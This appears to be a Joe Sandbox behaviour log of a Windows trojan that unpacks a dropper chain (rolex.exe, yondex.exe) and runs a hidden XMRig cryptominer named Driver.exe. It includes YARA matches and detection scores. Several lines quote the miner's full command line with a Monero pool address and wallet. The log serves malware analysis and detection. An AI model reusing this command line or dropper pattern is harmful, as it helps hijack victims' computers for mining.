                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4C8C1C3_2_00007FF7AB4C8C1C
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4A5B603_2_00007FF7AB4A5B60
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4ABB903_2_00007FF7AB4ABB90
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4B4B983_2_00007FF7AB4B4B98
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4CFA943_2_00007FF7AB4CFA94
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4A1A483_2_00007FF7AB4A1A48
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4D5AF83_2_00007FF7AB4D5AF8
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4B2AB03_2_00007FF7AB4B2AB0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB491AA43_2_00007FF7AB491AA4
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4AC96C3_2_00007FF7AB4AC96C
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4B39643_2_00007FF7AB4B3964
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4C89A03_2_00007FF7AB4C89A0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4D20803_2_00007FF7AB4D2080
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4B1F203_2_00007FF7AB4B1F20
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4AAF183_2_00007FF7AB4AAF18
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4B2D583_2_00007FF7AB4B2D58
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4C07543_2_00007FF7AB4C0754
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4B8DF43_2_00007FF7AB4B8DF4
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4B34843_2_00007FF7AB4B3484
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4B53F03_2_00007FF7AB4B53F0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4A126C3_2_00007FF7AB4A126C
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4972883_2_00007FF7AB497288
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB49C2F03_2_00007FF7AB49C2F0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB49A3103_2_00007FF7AB49A310
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4AF1803_2_00007FF7AB4AF180
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4B21D03_2_00007FF7AB4B21D0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4948403_2_00007FF7AB494840
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4CC8383_2_00007FF7AB4CC838
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4976C03_2_00007FF7AB4976C0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4AB5343_2_00007FF7AB4AB534
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4D25503_2_00007FF7AB4D2550
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeCode function: 4_2_013F7F984_2_013F7F98
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeCode function: 4_2_013F33884_2_013F3388
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeCode function: 4_2_013F33794_2_013F3379
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeCode function: 4_2_013F6FE04_2_013F6FE0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeCode function: 4_2_013F6A904_2_013F6A90
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 12_2_00C72DE812_2_00C72DE8
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 12_2_00C7769812_2_00C77698
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 12_2_00C7686812_2_00C76868
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 12_2_00C7631812_2_00C76318
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 16_2_02FD2FB816_2_02FD2FB8
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 16_2_02FD786816_2_02FD7868
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 16_2_02FD6A3816_2_02FD6A38
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 16_2_02FD2FA716_2_02FD2FA7
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 16_2_02FD64E816_2_02FD64E8
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe 8D6ABBA9B216172CFC64B8802DB0D20A1C634C96E1049F451EDDBA2363966BF0
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 7280 -ip 7280
                  Source: 4.0.yondex.exe.690000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner04 author = ditekSHen, description = Detects coinmining malware
                  Source: 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: Process Memory Space: Driver.exe PID: 7280, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner04 author = ditekSHen, description = Detects coinmining malware
                  Source: classification engineClassification label: mal100.troj.expl.evad.mine.winEXE@43/6@2/4
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65592B6D8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF65592B6D8
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655948624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF655948624
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeFile created: C:\Users\user\AppData\Roaming\SysfilesJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2124:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeMutant created: NULL
                  Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:8052:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7288:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7400:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7808:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7384:120:WilError_03
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
                  Source: h2UFp4aCRq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeFile read: C:\Windows\win.iniJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: h2UFp4aCRq.exeReversingLabs: Detection: 39%
                  Source: h2UFp4aCRq.exeVirustotal: Detection: 56%
                  Source: Driver.exeString found in binary or memory: r_id; jit_vmcnt=(vmcnt<s_waitcnt_value)?vmcnt:-1; if(vmcnt<s_waitcnt_value) s_waitcnt_value=vmcnt; done=true; } p=jit_emit_instruction(p,last_branch_target,jit_inst,jit_prefetch_vgpr_index,jit_vmcnt,batch_size); if(p-start_p>size_limit) { *(p++)=S_SETPC_B64_S1
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeFile read: C:\Users\user\Desktop\h2UFp4aCRq.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\h2UFp4aCRq.exe "C:\Users\user\Desktop\h2UFp4aCRq.exe"
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe rolex.exe -priverdD
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe"
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 7280 -ip 7280
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7280 -s 764
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe "C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe "C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe "C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe"
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7440 -s 552
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 548 -p 7424 -ip 7424
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7424 -s 876
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 508 -p 1712 -ip 1712
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1712 -s 864
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe rolex.exe -priverdDJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 7280 -ip 7280Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7280 -s 764Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7280 -s 764Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7440 -s 552Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 548 -p 7424 -ip 7424Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7424 -s 876Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 508 -p 1712 -ip 1712Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1712 -s 864Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: dxgidebug.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: dxgidebug.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: iertutil.dllJump to behavior
